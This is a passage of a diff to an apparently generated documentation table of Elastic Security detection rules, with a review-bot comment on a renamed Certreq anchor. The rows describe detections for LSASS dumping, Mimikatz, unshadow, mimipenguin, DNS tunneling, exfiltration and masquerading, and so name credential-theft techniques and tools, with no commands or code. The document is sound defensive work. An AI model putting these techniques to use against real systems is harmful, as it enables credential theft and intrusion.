|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Sysmon Only] |8.8.0 |206 +|<<potential-credential-access-via-lsass-memory-dump, Potential Credential Access via LSASS Memory Dump>> |Identifies suspicious access to LSASS handle from a call trace pointing to DBGHelp.dll or DBGCore.dll, which both export the MiniDumpWriteDump method that can be used to dump LSASS memory content in preparation for credential access. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic:Execution], [Data Source: Sysmon Only] |8.8.0 |207 -|<<potential-credential-access-via-renamed-com-services-dll, Potential Credential Access via Renamed COM+ Services DLL>> |Identifies suspicious renamed COMSVCS.DLL Image Load, which exports the MiniDump function that can be used to dump a process memory. This may indicate an attempt to dump LSASS memory while bypassing command-line based detection in preparation for credential access. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Sysmon Only] |8.3.0 |104 +|<<potential-credential-access-via-memory-dump-file-creation, Potential Credential Access via Memory Dump File Creation>> |Identifies the creation or modification of a medium size memory dump file which can indicate an attempt to access credentials from a process memory. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 -|<<potential-credential-access-via-trusted-developer-utility, Potential Credential Access via Trusted Developer Utility>> |An instance of MSBuild, the Microsoft Build Engine, loaded DLLs (dynamically linked libraries) responsible for Windows credential management. This technique is sometimes used for credential dumping. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 +|<<potential-credential-access-via-renamed-com-services-dll, Potential Credential Access via Renamed COM+ Services DLL>> |Identifies suspicious renamed COMSVCS.DLL Image Load, which exports the MiniDump function that can be used to dump a process memory. This may indicate an attempt to dump LSASS memory while bypassing command-line based detection in preparation for credential access. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Defense Evasion], [Data Source: Sysmon Only] |8.3.0 |105 -|<<potential-credential-access-via-windows-utilities, Potential Credential Access via Windows Utilities>> |Identifies the execution of known Windows utilities often abused to dump LSASS memory or the Active Directory database (NTDS.dit) in preparation for credential access. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 +|<<potential-credential-access-via-trusted-developer-utility, Potential Credential Access via Trusted Developer Utility>> |An instance of MSBuild, the Microsoft Build Engine, loaded DLLs (dynamically linked libraries) responsible for Windows credential management. This technique is sometimes used for credential dumping. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |108 + +|<<potential-credential-access-via-windows-utilities, Potential Credential Access via Windows Utilities>> |Identifies the execution of known Windows utilities often abused to dump LSASS memory or the Active Directory database (NTDS.dit) in preparation for credential access. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |109 |<<potential-cross-site-scripting-xss, Potential Cross Site Scripting (XSS)>> |Cross-Site Scripting (XSS) is a type of attack in which malicious scripts are injected into trusted websites. In XSS attacks, an attacker uses a benign web application to send malicious code, generally in the form of a browser-side script. This detection rule identifies the potential malicious executions of such browser-side scripts. |[Data Source: APM], [Use Case: Threat Detection], [Tactic: Initial Access] |8.3.0 |1 +|<<potential-dga-activity, Potential DGA Activity>> |A population analysis machine learning job detected potential DGA (domain generation algorithm) activity. Such activity is often used by malware command and control (C2) channels. This machine learning job looks for a source IP address making DNS requests that have an aggregate high probability of being DGA activity. |[Use Case: Domain Generation Algorithm Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Command and Control] |8.9.0 |1 + |<<potential-dll-side-loading-via-microsoft-antimalware-service-executable, Potential DLL Side-Loading via Microsoft Antimalware Service Executable>> |Identifies a Windows trusted program that is known to be vulnerable to DLL Search Order Hijacking starting after being renamed or from a non-standard path. This is uncommon behavior and may indicate an attempt to evade defenses via side-loading a malicious DLL within the memory space of one of those processes. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |107 -|<<potential-dll-sideloading-via-trusted-microsoft-programs, Potential DLL SideLoading via Trusted Microsoft Programs>> |Identifies an instance of a Windows trusted program that is known to be vulnerable to DLL Search Order Hijacking starting after being renamed or from a non-standard path. This is uncommon behavior and may indicate an attempt to evade defenses via side loading a malicious DLL within the memory space of one of those processes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<potential-dll-side-loading-via-trusted-microsoft-programs, Potential DLL Side-Loading via Trusted Microsoft Programs>> |Identifies an instance of a Windows trusted program that is known to be vulnerable to DLL Search Order Hijacking starting after being renamed or from a non-standard path. This is uncommon behavior and may indicate an attempt to evade defenses via side loading a malicious DLL within the memory space of one of those processes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 + +|<<potential-dns-tunneling-via-nslookup, Potential DNS Tunneling via NsLookup>> |This rule identifies a large number (15) of nslookup.exe executions with an explicit query type from the same host. This may indicate command and control activity utilizing the DNS protocol. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<potential-dns-tunneling-via-nslookup, Potential DNS Tunneling via NsLookup>> |This rule identifies a large number (15) of nslookup.exe executions with an explicit query type from the same host. This may indicate command and control activity utilizing the DNS protocol. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<potential-data-exfiltration-activity-to-an-unusual-destination-port, Potential Data Exfiltration Activity to an Unusual Destination Port>> |A machine learning job has detected data exfiltration to a particular destination port. Data transfer patterns that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. |[Use Case: Data Exfiltration Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Exfiltration] |8.9.0 |1 + +|<<potential-data-exfiltration-activity-to-an-unusual-ip-address, Potential Data Exfiltration Activity to an Unusual IP Address>> |A machine learning job has detected data exfiltration to a particular geo-location (by IP address). Data transfers to geo-locations that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. |[Use Case: Data Exfiltration Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Exfiltration] |8.9.0 |1 + +|<<potential-data-exfiltration-activity-to-an-unusual-iso-code, Potential Data Exfiltration Activity to an Unusual ISO Code>> |A machine learning job has detected data exfiltration to a particular geo-location (by region name). 
Data transfers to geo-locations that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. |[Use Case: Data Exfiltration Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Exfiltration] |8.9.0 |1 + +|<<potential-data-exfiltration-activity-to-an-unusual-region, Potential Data Exfiltration Activity to an Unusual Region>> |A machine learning job has detected data exfiltration to a particular geo-location (by region name). Data transfers to geo-locations that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. |[Use Case: Data Exfiltration Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Exfiltration] |8.9.0 |1 |<<potential-defense-evasion-via-cmstp-exe, Potential Defense Evasion via CMSTP.exe>> |The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program to install Connection Manager service profiles, which accept installation information file (INF) files. Adversaries may abuse CMSTP to proxy the execution of malicious code by supplying INF files that contain malicious commands. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 -|<<potential-defense-evasion-via-proot, Potential Defense Evasion via PRoot>> |Identifies the execution of the PRoot utility, an open-source tool for user-space implementation of chroot, mount --bind, and binfmt_misc. Adversaries can leverage an open-source tool PRoot to expand the scope of their operations to multiple Linux distributions and simplify their necessary efforts. In a normal threat scenario, the scope of an attack is limited by the varying configurations of each Linux distribution. With PRoot, it provides an attacker with a consistent operational environment across different Linux distributions, such as Ubuntu, Fedora, and Alpine. 
PRoot also provides emulation capabilities that allow for malware built on other architectures, such as ARM, to be run.The post-exploitation technique called bring your own filesystem (BYOF), can be used by the threat actors to execute malicious payload or elevate privileges or perform network scans or orchestrate another attack on the environment. Although PRoot was originally not developed with malicious intent it can be easily tuned to work for one. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |3 +|<<potential-defense-evasion-via-proot, Potential Defense Evasion via PRoot>> |Identifies the execution of the PRoot utility, an open-source tool for user-space implementation of chroot, mount --bind, and binfmt_misc. Adversaries can leverage an open-source tool PRoot to expand the scope of their operations to multiple Linux distributions and simplify their necessary efforts. In a normal threat scenario, the scope of an attack is limited by the varying configurations of each Linux distribution. With PRoot, it provides an attacker with a consistent operational environment across different Linux distributions, such as Ubuntu, Fedora, and Alpine. PRoot also provides emulation capabilities that allow for malware built on other architectures, such as ARM, to be run.The post-exploitation technique called bring your own filesystem (BYOF), can be used by the threat actors to execute malicious payload or elevate privileges or perform network scans or orchestrate another attack on the environment. Although PRoot was originally not developed with malicious intent it can be easily tuned to work for one. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |4 -|<<potential-disabling-of-apparmor, Potential Disabling of AppArmor>> |This rule monitors for potential attempts to disable AppArmor. 
AppArmor is a Linux security module that enforces fine-grained access control policies to restrict the actions and resources that specific applications and processes can access. Adversaries may disable security tools to avoid possible detection of their tools and activities. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |1 +|<<potential-disabling-of-apparmor, Potential Disabling of AppArmor>> |This rule monitors for potential attempts to disable AppArmor. AppArmor is a Linux security module that enforces fine-grained access control policies to restrict the actions and resources that specific applications and processes can access. Adversaries may disable security tools to avoid possible detection of their tools and activities. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |2 -|<<potential-disabling-of-selinux, Potential Disabling of SELinux>> |Identifies potential attempts to disable Security-Enhanced Linux (SELinux), which is a Linux kernel security feature to support access control policies. Adversaries may disable security tools to avoid possible detection of their tools and activities. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<potential-disabling-of-selinux, Potential Disabling of SELinux>> |Identifies potential attempts to disable Security-Enhanced Linux (SELinux), which is a Linux kernel security feature to support access control policies. Adversaries may disable security tools to avoid possible detection of their tools and activities. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 |<<potential-evasion-via-filter-manager, Potential Evasion via Filter Manager>> |The Filter Manager Control Program (fltMC.exe) binary may be abused by adversaries to unload a filter driver and evade defenses. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 -|<<potential-exfiltration-via-certreq, Potential Exfiltration via Certreq>> |Identifies Certreq making an HTTP Post request. Adversaries could abuse Certreq to exfiltrate data to a remote URL. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Command and Control], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |4 - |<<potential-exploitation-of-an-unquoted-service-path-vulnerability, Potential Exploitation of an Unquoted Service Path Vulnerability>> |Adversaries may leverage unquoted service path vulnerabilities to escalate privileges. By placing an executable in a higher-level directory within the path of an unquoted service executable, Windows will natively launch this executable from its defined path variable instead of the benign one in a deeper directory, thus leading to code execution. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |2 -|<<potential-external-linux-ssh-brute-force-detected, Potential External Linux SSH Brute Force Detected>> |Identifies multiple external consecutive login failures targeting a user account from the same source address within a short time interval. 
Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to these accounts. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access] |8.3.0 |3 +|<<potential-external-linux-ssh-brute-force-detected, Potential External Linux SSH Brute Force Detected>> |Identifies multiple external consecutive login failures targeting a user account from the same source address within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to these accounts. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access] |8.3.0 |4 + +|<<potential-file-transfer-via-certreq, Potential File Transfer via Certreq>> |Identifies Certreq making an HTTP Post request. Adversaries could abuse Certreq to download files or upload data to a remote URL. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Command and Control], [Tactic: Exfiltration], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |5 |<<potential-hidden-local-user-account-creation, Potential Hidden Local User Account Creation>> |Identifies attempts to create a local account that will be hidden from the macOS logon window. This may indicate an attempt to evade user attention while maintaining persistence using a separate local account. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 -|<<potential-hidden-process-via-mount-hidepid, Potential Hidden Process via Mount Hidepid>> |Identifies the execution of mount process with hidepid parameter, which can make processes invisible to other users from the system. Adversaries using Linux kernel version 3.2+ (or RHEL/CentOS v6.5+ above) can hide the process from other users. 
When hidepid=2 option is executed to mount the /proc filesystem, only the root user can see all processes and the logged-in user can only see their own process. This provides a defense evasion mechanism for the adversaries to hide their process executions from all other commands such as ps, top, pgrep and more. With the Linux kernel hardening hidepid option all the user has to do is remount the /proc filesystem with the option, which can now be monitored and detected. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |3 +|<<potential-hidden-process-via-mount-hidepid, Potential Hidden Process via Mount Hidepid>> |Identifies the execution of mount process with hidepid parameter, which can make processes invisible to other users from the system. Adversaries using Linux kernel version 3.2+ (or RHEL/CentOS v6.5+ above) can hide the process from other users. When hidepid=2 option is executed to mount the /proc filesystem, only the root user can see all processes and the logged-in user can only see their own process. This provides a defense evasion mechanism for the adversaries to hide their process executions from all other commands such as ps, top, pgrep and more. With the Linux kernel hardening hidepid option all the user has to do is remount the /proc filesystem with the option, which can now be monitored and detected. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |4 -|<<potential-internal-linux-ssh-brute-force-detected, Potential Internal Linux SSH Brute Force Detected>> |Identifies multiple internal consecutive login failures targeting a user account from the same source address within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to these accounts. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access] |8.3.0 |7 +|<<potential-internal-linux-ssh-brute-force-detected, Potential Internal Linux SSH Brute Force Detected>> |Identifies multiple internal consecutive login failures targeting a user account from the same source address within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to these accounts. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access] |8.3.0 |8 |<<potential-invoke-mimikatz-powershell-script, Potential Invoke-Mimikatz PowerShell Script>> |Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. This rule detects Invoke-Mimikatz PowerShell script and alike. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |106 
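Review bot: The renamed Certreq entry in this hunk drops the old anchor `potential-exfiltration-via-certreq` and replaces it with `potential-file-transfer-via-certreq` (version 4 to 5, `[Tactic: Exfiltration]` added); please confirm that the corresponding rule page file was renamed in the same patch and that no other page in the docs still xrefs the old anchor, otherwise the asciidoc build will emit a broken cross-reference. The removed `potential-exploitation-of-an-unquoted-service-path-vulnerability` row has no `+` counterpart, which matches "removed deprecations from summary" in the commit message, but the PRoot row is bumped from version 3 to 4 with its description text carried over verbatim, including the missing space in "to be run.The post-exploitation technique"; since these rows are generated from the rule descriptions, that wording should be fixed in the rule source rather than hand-edited here, and the same applies to "RHEL/CentOS v6.5+ above" in the bumped hidepid row.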
@@ -1096,55 +1134,59 @@ and their rule type is `machine_learning`. |<<potential-lsass-memory-dump-via-psscapturesnapshot, Potential LSASS Memory Dump via PssCaptureSnapShot>> |Identifies suspicious access to an LSASS handle via PssCaptureSnapShot where two successive process accesses are performed by the same process and target two different instances of LSASS. This may indicate an attempt to evade detection and dump LSASS memory for credential access. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Sysmon Only] |8.8.0 |206 -|<<potential-lateral-tool-transfer-via-smb-share, Potential Lateral Tool Transfer via SMB Share>> |Identifies the creation or change of a Windows executable file over network shares. Adversaries may transfer tools or other files between systems in a compromised environment. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |106 +|<<potential-lateral-tool-transfer-via-smb-share, Potential Lateral Tool Transfer via SMB Share>> |Identifies the creation or change of a Windows executable file over network shares. Adversaries may transfer tools or other files between systems in a compromised environment. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 -|<<potential-linux-backdoor-user-account-creation, Potential Linux Backdoor User Account Creation>> |Identifies the attempt to create a new backdoor user by setting the user's UID to 0. Attackers may alter a user's UID to 0 to establish persistence on a system. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |3 +|<<potential-linux-backdoor-user-account-creation, Potential Linux Backdoor User Account Creation>> |Identifies the attempt to create a new backdoor user by setting the user's UID to 0. Attackers may alter a user's UID to 0 to establish persistence on a system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |4 -|<<potential-linux-credential-dumping-via-proc-filesystem, Potential Linux Credential Dumping via Proc Filesystem>> |Identifies the execution of the mimipenguin exploit script which is linux adaptation of Windows tool mimikatz. Mimipenguin exploit script is used to dump clear text passwords from a currently logged-in user. The tool exploits a known vulnerability CVE-2018-20781. Malicious actors can exploit the cleartext credentials in memory by dumping the process and extracting lines that have a high probability of containing cleartext passwords. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |3 +|<<potential-linux-credential-dumping-via-proc-filesystem, Potential Linux Credential Dumping via Proc Filesystem>> |Identifies the execution of the mimipenguin exploit script which is linux adaptation of Windows tool mimikatz. Mimipenguin exploit script is used to dump clear text passwords from a currently logged-in user. The tool exploits a known vulnerability CVE-2018-20781. Malicious actors can exploit the cleartext credentials in memory by dumping the process and extracting lines that have a high probability of containing cleartext passwords. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |4 -|<<potential-linux-credential-dumping-via-unshadow, Potential Linux Credential Dumping via Unshadow>> |Identifies the execution of the unshadow utility which is part of John the Ripper, a password-cracking tool on the host machine. Malicious actors can use the utility to retrieve the combined contents of the '/etc/shadow' and '/etc/password' files. Using the combined file generated from the utility, the malicious threat actors can use them as input for password-cracking utilities or prepare themselves for future operations by gathering credential information of the victim. |[Data Source: Elastic Endgame], [Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend] |8.3.0 |4 +|<<potential-linux-credential-dumping-via-unshadow, Potential Linux Credential Dumping via Unshadow>> |Identifies the execution of the unshadow utility which is part of John the Ripper, a password-cracking tool on the host machine. Malicious actors can use the utility to retrieve the combined contents of the '/etc/shadow' and '/etc/password' files. Using the combined file generated from the utility, the malicious threat actors can use them as input for password-cracking utilities or prepare themselves for future operations by gathering credential information of the victim. |[Data Source: Elastic Endgame], [Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend] |8.3.0 |5 -|<<potential-linux-local-account-brute-force-detected, Potential Linux Local Account Brute Force Detected>> |Identifies multiple consecutive login attempts executed by one process targeting a local linux user account within a short time interval. 
Adversaries might brute force login attempts across different users with a default wordlist or a set of customly crafted passwords in an attempt to gain access to these accounts. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend] |8.3.0 |2 +|<<potential-linux-hack-tool-launched, Potential Linux Hack Tool Launched>> |Monitors for the execution of different processes that might be used by attackers for malicious intent. An alert from this rule should be investigated further, as hack tools are commonly used by blue teamers and system administrators as well. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |1 -|<<potential-linux-ransomware-note-creation-detected, Potential Linux Ransomware Note Creation Detected>> |This rule identifies a sequence of a mass file encryption event in conjunction with the creation of a .txt file with a file name containing ransomware keywords executed by the same process in a 1 second timespan. Ransomware is a type of malware that encrypts a victim's files or systems and demands payment (usually in cryptocurrency) in exchange for the decryption key. One important indicator of a ransomware attack is the mass encryption of the file system, after which a new file extension is added to the file. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Impact], [Data Source: Elastic Defend] |8.3.0 |5 +|<<potential-linux-local-account-brute-force-detected, Potential Linux Local Account Brute Force Detected>> |Identifies multiple consecutive login attempts executed by one process targeting a local linux user account within a short time interval. Adversaries might brute force login attempts across different users with a default wordlist or a set of customly crafted passwords in an attempt to gain access to these accounts. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend] |8.3.0 |3 + +|<<potential-linux-ransomware-note-creation-detected, Potential Linux Ransomware Note Creation Detected>> |This rule identifies a sequence of a mass file encryption event in conjunction with the creation of a .txt file with a file name containing ransomware keywords executed by the same process in a 1 second timespan. Ransomware is a type of malware that encrypts a victim's files or systems and demands payment (usually in cryptocurrency) in exchange for the decryption key. One important indicator of a ransomware attack is the mass encryption of the file system, after which a new file extension is added to the file. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Impact], [Data Source: Elastic Defend] |8.3.0 |6 |<<potential-linux-ssh-x11-forwarding, Potential Linux SSH X11 Forwarding>> |This rule monitors for X11 forwarding via SSH. X11 forwarding is a feature that allows users to run graphical applications on a remote server and display the application's graphical user interface on their local machine. Attackers can abuse X11 forwarding for tunneling their GUI-based tools, pivot through compromised systems, and create covert communication channels, enabling lateral movement and facilitating remote control of systems within a network. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 -|<<potential-linux-tunneling-and-or-port-forwarding, Potential Linux Tunneling and/or Port Forwarding>> |This rule monitors for a set of Linux utilities that can be used for tunneling and port forwarding. 
Attackers can leverage tunneling and port forwarding techniques to bypass network defenses, establish hidden communication channels, and gain unauthorized access to internal resources, facilitating data exfiltration, lateral movement, and remote control. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend] |8.3.0 |1 +|<<potential-linux-tunneling-and-or-port-forwarding, Potential Linux Tunneling and/or Port Forwarding>> |This rule monitors for a set of Linux utilities that can be used for tunneling and port forwarding. Attackers can leverage tunneling and port forwarding techniques to bypass network defenses, establish hidden communication channels, and gain unauthorized access to internal resources, facilitating data exfiltration, lateral movement, and remote control. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend] |8.3.0 |2 -|<<potential-local-ntlm-relay-via-http, Potential Local NTLM Relay via HTTP>> |Identifies attempt to coerce a local NTLM authentication via HTTP using the Windows Printer Spooler service as a target. An adversary may use this primitive in combination with other techniques to elevate privileges on a compromised system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<potential-local-ntlm-relay-via-http, Potential Local NTLM Relay via HTTP>> |Identifies attempt to coerce a local NTLM authentication via HTTP using the Windows Printer Spooler service as a target. An adversary may use this primitive in combination with other techniques to elevate privileges on a compromised system. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<potential-malicious-file-downloaded-from-google-drive, Potential Malicious File Downloaded from Google Drive>> |Identifies potential malicious file download and execution from Google Drive. The rule checks for download activity from Google Drive URL, followed by the creation of files commonly leveraged by or for malware. This could indicate an attempt to run malicious scripts, executables or payloads. |[Domain: Endpoint], [OS: Linux], [OS: Windows], [OS: macOS], [Use Case: Threat Detection], [Tactic: Command and Control] |8.3.0 |1 -|<<potential-masquerading-as-browser-process, Potential Masquerading as Browser Process>> |Identifies suspicious instances of browser processes, such as unsigned or signed with unusual certificates, that can indicate an attempt to conceal malicious activity, bypass security features such as allowlists, or trick users into executing malware. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 +|<<potential-masquerading-as-browser-process, Potential Masquerading as Browser Process>> |Identifies suspicious instances of browser processes, such as unsigned or signed with unusual certificates, that can indicate an attempt to conceal malicious activity, bypass security features such as allowlists, or trick users into executing malware. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Persistence], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |2 -|<<potential-masquerading-as-business-app-installer, Potential Masquerading as Business App Installer>> |Identifies executables with names resembling legitimate business applications but lacking signatures from the original developer. 
Attackers may trick users into downloading malicious executables that masquerade as legitimate applications via malicious ads, forum posts, and tutorials, effectively gaining initial access. |[Domain: Endpoint], [Data Source: Elastic Defend], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR] |8.3.0 |1 +|<<potential-masquerading-as-business-app-installer, Potential Masquerading as Business App Installer>> |Identifies executables with names resembling legitimate business applications but lacking signatures from the original developer. Attackers may trick users into downloading malicious executables that masquerade as legitimate applications via malicious ads, forum posts, and tutorials, effectively gaining initial access. |[Domain: Endpoint], [Data Source: Elastic Defend], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Initial Access], [Tactic: Execution], [Rule Type: BBR] |8.3.0 |2 -|<<potential-masquerading-as-communication-apps, Potential Masquerading as Communication Apps>> |Identifies suspicious instances of communications apps, both unsigned and renamed ones, that can indicate an attempt to conceal malicious activity, bypass security features such as allowlists, or trick users into executing malware. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |3 +|<<potential-masquerading-as-communication-apps, Potential Masquerading as Communication Apps>> |Identifies suspicious instances of communications apps, both unsigned and renamed ones, that can indicate an attempt to conceal malicious activity, bypass security features such as allowlists, or trick users into executing malware. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |4 -|<<potential-masquerading-as-system32-dll, Potential Masquerading as System32 DLL>> |Identifies suspicious instances of default system32 DLLs either unsigned or signed with non-MS certificates. This can potentially indicate the attempt to masquerade as system DLLs, perform DLL Search Order Hijacking or backdoor and resign legitimate DLLs. |[Domain: Endpoint], [Data Source: Elastic Defend], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR] |8.3.0 |1 +|<<potential-masquerading-as-system32-dll, Potential Masquerading as System32 DLL>> |Identifies suspicious instances of default system32 DLLs either unsigned or signed with non-MS certificates. This can potentially indicate the attempt to masquerade as system DLLs, perform DLL Search Order Hijacking or backdoor and resign legitimate DLLs. |[Domain: Endpoint], [Data Source: Elastic Defend], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Persistence], [Rule Type: BBR] |8.4.0 |102 -|<<potential-masquerading-as-system32-executable, Potential Masquerading as System32 Executable>> |Identifies suspicious instances of default system32 executables, either unsigned or signed with non-MS certificates. 